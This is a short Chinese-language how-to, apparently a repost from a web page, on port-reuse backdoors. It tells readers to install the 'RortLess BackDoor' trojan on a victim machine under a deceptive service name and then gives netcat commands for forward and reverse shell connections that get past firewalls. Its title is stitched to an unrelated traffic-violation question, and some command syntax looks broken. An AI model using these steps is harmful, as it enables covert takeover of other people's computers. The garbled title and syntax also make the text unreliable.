如何第一时间知道违章:什么是端口复用技术?

端口复用技术，通过其名字就可以大致猜到它的原理，就是重复性地打开某个已打开的端口来绑定我们的shell，例如：如果对方打开了80端口，我们就可以复用它。这样的做法能够有效的通过防火墙规则，因此连接的成功机率非常高。

听说过RortLess BackDoor吗？真是个有内秀的木马软件！

这个软件的压缩包里面有这样两个文件：portlessinst.exe、svchostdll.dll，记得要上传到主机的系统文件夹里、安装。安装格式为：portlessinst -install <特征串> <密码>

“特征串”要设置一个具有迷惑性的名字，因为它将出现在安装后的系统服务里面，“密码”是以后连接时需要的，要记住啊。

然后用“net start 服务名”来启动服务，OK！

现在好了，假设我们把上面的一切都做好了，而且对方IP是192.168.0.1，开了139，再假设我们设的服务是fuwu，密码设为123456，那么让我们来连接它！

nc 192.168.0.1 139
fuwu:135

接下来让我们先退出一下。

再连接：

nc 192.168.0.1 135

系统提示Enter Password:时，输入123456就登录上去了，呵！

上面说的是正向连接方式，如果对方开了防火墙，登录失败的话，我们可以试试反向连接：

假设我们的IP是192.168.0.2，则输入以下命令：

nc -l -p 6000 --->这里监听的6000端口可以随意设置

新开窗口输入：

nc -vv -192.168.0.1 80
fuwu|192.168.0.2:123456